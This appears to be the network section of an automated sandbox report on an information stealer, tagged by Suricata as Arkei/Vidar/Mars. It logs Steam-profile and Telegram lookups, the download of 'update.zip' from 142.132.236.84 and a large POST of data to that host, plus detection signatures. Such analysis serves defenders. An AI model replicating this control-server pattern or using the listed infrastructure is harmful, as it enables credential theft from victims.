Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
t.me | 149.154.167.99 | |
steamcommunity.com | 104.110.72.183 |
- UDP Requests
-
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.102:137 192.168.56.103:137
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:49154 239.255.255.250:1900
-
52.231.114.183:123 192.168.56.103:123
-
GET
200
https://steamcommunity.com/profiles/76561199441933804
REQUEST
RESPONSE
BODY
GET /profiles/76561199441933804 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
Host: steamcommunity.com
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ *.google-analytics.com https://www.google.com https://www.gstatic.com https://apis.google.com https://recaptcha.net https://www.gstatic.cn/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ *.google-analytics.com https://*.valvesoftware.com https://*.steambeta.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Tue, 13 Dec 2022 01:01:16 GMT
Content-Length: 32884
Connection: keep-alive
Set-Cookie: sessionid=44f02d24fa5af17898949404; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=KR%7Cf412d3b2c2b6515b2cdce927ad7acf7b; Path=/; Secure; HttpOnly; SameSite=None
GET
200
http://142.132.236.84/1909
REQUEST
RESPONSE
BODY
GET /1909 HTTP/1.1
Host: 142.132.236.84
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 Dec 2022 01:01:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://142.132.236.84/update.zip
REQUEST
RESPONSE
BODY
GET /update.zip HTTP/1.1
Host: 142.132.236.84
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 Dec 2022 01:01:16 GMT
Content-Type: application/zip
Content-Length: 3642574
Connection: keep-alive
Last-Modified: Mon, 04 Jul 2022 10:49:28 GMT
ETag: "62c2c5b8-3794ce"
Expires: Wed, 14 Dec 2022 01:01:16 GMT
Cache-Control: max-age=86400
X-Cache-Status: HIT
Accept-Ranges: bytes
POST
200
http://142.132.236.84/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----7294135935084507
Host: 142.132.236.84
Content-Length: 114357
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 Dec 2022 01:01:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49165 -> 149.154.167.99:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49168 -> 23.42.123.237:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49169 -> 142.132.236.84:80 | 2027262 | ET INFO Dotted Quad Host ZIP Request | Potentially Bad Traffic |
TCP 192.168.56.103:49164 -> 149.154.167.99:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 149.154.167.99:443 -> 192.168.56.103:49166 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
TCP 192.168.56.103:49169 -> 142.132.236.84:80 | 2036316 | ET MALWARE Arkei/Vidar/Mars Stealer Variant | A Network Trojan was detected |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49168 23.42.123.237:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA | unknown=Private Organization, unknown=US, unknown=Washington, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com | eb:03:15:e9:08:7d:12:ff:50:d3:74:ee:4a:87:15:c1:03:e9:c9:e3 |
Snort Alerts
No Snort Alerts